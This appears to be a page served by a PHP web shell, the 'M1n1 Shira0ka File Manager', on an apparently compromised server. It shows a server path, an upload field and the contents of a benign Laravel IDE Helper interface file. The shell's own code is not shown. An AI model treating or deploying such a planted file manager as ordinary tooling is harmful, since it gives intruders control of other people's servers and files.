M1n1 Shira0ka File Manager

Current Path : /home/bullgymbny/app/vendor/barryvdh/laravel-ide-helper/src/Contracts/
Upload File :
Current File : /home/bullgymbny/app/vendor/barryvdh/laravel-ide-helper/src/Contracts/ModelHookInterface.php

<?php

namespace Barryvdh\LaravelIdeHelper\Contracts;

use Barryvdh\LaravelIdeHelper\Console\ModelsCommand;
use Illuminate\Database\Eloquent\Model;

interface ModelHookInterface
{
    public function run(ModelsCommand $command, Model $model): void;
}

GO Party By You